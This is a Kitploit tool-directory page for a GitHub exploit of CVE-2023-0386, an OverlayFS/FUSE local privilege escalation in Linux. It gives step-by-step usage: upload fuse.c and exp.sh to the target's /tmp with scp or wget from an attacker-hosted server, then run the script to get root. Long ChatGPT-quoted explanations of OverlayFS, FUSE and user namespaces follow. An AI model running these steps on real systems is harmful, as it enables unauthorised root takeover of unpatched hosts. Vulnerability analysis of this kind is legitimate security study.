Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-0386 — 非常简单的CVE-2023-0386's exp and analysis.Use c and sh. | Kitploit
Tools/GitHubGitHub/fanxiaoyao66/cve-2023-0386
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationContainer EscapeBinary Exploitation
GitHubfanxiaoyao66/cve-2023-0386

CVE-2023-0386

非常简单的CVE-2023-0386's exp and analysis.Use c and sh.

View Repository
224163 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

typora-copy-images-to: ./image

CVE-2023-0386

Exploit Usage:

First: Upload fuse.c and exp.sh to the /tmp directory.

  • You can use scp or python3 -m http.server to upload the file to the target.

    scp ~/Desktop/CVE-2023-0386/exp.sh [email protected]:/tmp 
    scp ~/Desktop/CVE-2023-0386/fuse.c [email protected]:/tmp #your machine
    

    or

    cd ~/Desktop/CVE-2023-0386
    python3 -m http.server #your machine
    
    wget your_ip:8000/exp.sh
    wget your_ip:8000/fuse.c #target
    

Then:

cd /tmp
/bin/bash exp.sh

Now, you are root!

image-20230628154304898

The following is a detailed analysis of CVE-2023-0386.


I spent a day studying this vulnerability. Simply put, when OverlayFS copies a file from the lower layer to the upper layer, it does not check whether the user of the lower file's namespace is mapped to the current user namespace, allowing the setting of the suid bit for privilege escalation.

This sounds very abstract. To understand the problem, you first need to know a few things:

  • What is OverlayFS?
  • What is FUSE?
  • What is a user namespace?
  • Why does privilege escalation happen?

What is OverlayFS?

ChatGPT: Provide a detailed introduction to OverlayFS in Linux.

OverlayFS, also known as the Overlay filesystem, is a union filesystem in the Linux kernel. It allows multiple different filesystems to be stacked on top of each other, forming a single, unified view. It was officially accepted into the kernel in Linux version 3.18.

OverlayFS has three main components: the lower filesystem, the upper filesystem, and the merged filesystem. Their roles are as follows:

  1. Lower filesystem: This is the base layer, usually read-only. All files and directories are initially obtained from this layer.

  2. Upper filesystem: This is the top layer, usually writable. When we write to the filesystem, all changes are saved here. If a file exists in the lower filesystem but we want to modify it, a copy of the file is created in the upper filesystem and then modified. This process is called "copy-up".

  3. Merged filesystem: This is the final view of OverlayFS, combining the lower and upper filesystems. When we perform a read operation, OverlayFS first looks for the file in the upper filesystem; if not found, it looks in the lower filesystem.

The logical view of this structure is as follows:

     ________________
    |                |
    |  Merged View   |
    |________________|
       /          \
____________    ____________
|          |    |          |
|  Lower   |    |  Upper   |
| (read-only)|  | (read-write)|
|____________|  |____________|

An important application of OverlayFS is in containerized applications, especially Docker. In Docker, each image layer is read-only and can be used as the lower filesystem for other containers. When we start a new container, Docker creates a new, empty upper filesystem for it. This way, all changes to the container (e.g., installing new software) only affect the upper filesystem, not the shared image layers.

Additionally, because OverlayFS allows multiple lower filesystems to be mounted under a single upper layer, we can create filesystems with multiple layers, widely used in Docker's image layering.


In summary, the lower files are read-only, the upper files are read-write, and the merged layer combines the lower and upper layers to display a unified view. When we modify a file in the merged layer that exists in the lower layer but not in the upper layer, the lower file is copied verbatim to the upper layer for modification. This is where the vulnerability is triggered.

What is FUSE?

GPT: You are a Linux kernel expert. Now please explain in detail what FUSE is.

FUSE (Filesystem in Userspace) is a mechanism for creating filesystems in userspace. It is an interface provided by the Linux kernel that allows users to develop and run their own filesystems without modifying kernel code.

The main goal of FUSE is to simplify the development and use of new filesystems. Using FUSE, you can create custom filesystems without needing to know many details of kernel APIs. This is useful for debugging, rapid prototyping, academic research, implementing very specific filesystems (such as transparent encrypted filesystems, network filesystems), etc.

In FUSE, most of the filesystem logic runs in userspace. This makes development easier because userspace provides a more friendly development environment: you can use any programming language you like, you have more libraries available, error handling is simpler, etc. On the other hand, this also means that FUSE filesystems are generally slower than kernel-space filesystems because they require frequent context switches between userspace and kernel space.

A FUSE filesystem typically consists of two parts:

  1. A userspace daemon that implements the actual logic of the filesystem.
  2. The kernel-space FUSE module that handles all filesystem operations, forwards them to the userspace daemon, and returns the results to the caller.

When developing a FUSE filesystem, you need to implement a series of callback functions that correspond to various filesystem operations, such as opening a file, reading a file, writing a file, etc. When these operations occur, the FUSE kernel module calls the corresponding callback functions and returns the results to the caller.

In summary, FUSE provides a powerful framework for implementing filesystems in userspace, simplifying filesystem development and allowing filesystems to be extended and modified in a modular way.


In fact, FUSE allows users to define a custom filesystem and the files within it.

We need to write FUSE-related code in C.

What is a user namespace?

You are a Linux kernel expert. What is a user namespace?

In Linux, a "namespace" is a kernel feature that can isolate a process's view, allowing it to see only resources belonging to the same namespace. Each type of namespace corresponds to a specific type of resource. For example, PID (Process ID) namespaces isolate process IDs, Net namespaces isolate network interfaces and stacks, Mount namespaces isolate filesystem mount points, etc.

User namespaces are a type of Linux namespace, mainly used to isolate user and group IDs. Each user namespace has its own set of user and group IDs. For example, a process may run as root (UID 0) in user namespace A, but in user namespace B, the same process may be just a normal user.

The advantage of this is that even if a process has root privileges within its user namespace, it cannot affect resources in other user namespaces, because in other namespaces, it may be just a normal user. This greatly enhances system security, so that even if a container (which is essentially a set of processes running in their own namespaces) is compromised, the attacker cannot affect the host system or other containers.

User namespaces are one of the core technologies of Linux containers (such as Docker, LXC, etc.). By using user namespaces and other types of namespaces, containers can provide isolation similar to virtual machines without the need for virtualization.

In summary, user namespaces are a mechanism in Linux for isolating user and group IDs, playing an important role in improving system and container security.

What is user namespace mapping?

In Linux user namespaces, there is a very important concept: user namespace mapping. This mapping defines how user and group IDs are translated between different user namespaces. That is, a process that appears to be root inside one user namespace may be just a normal, unprivileged user in the host or another namespace.

Download Tool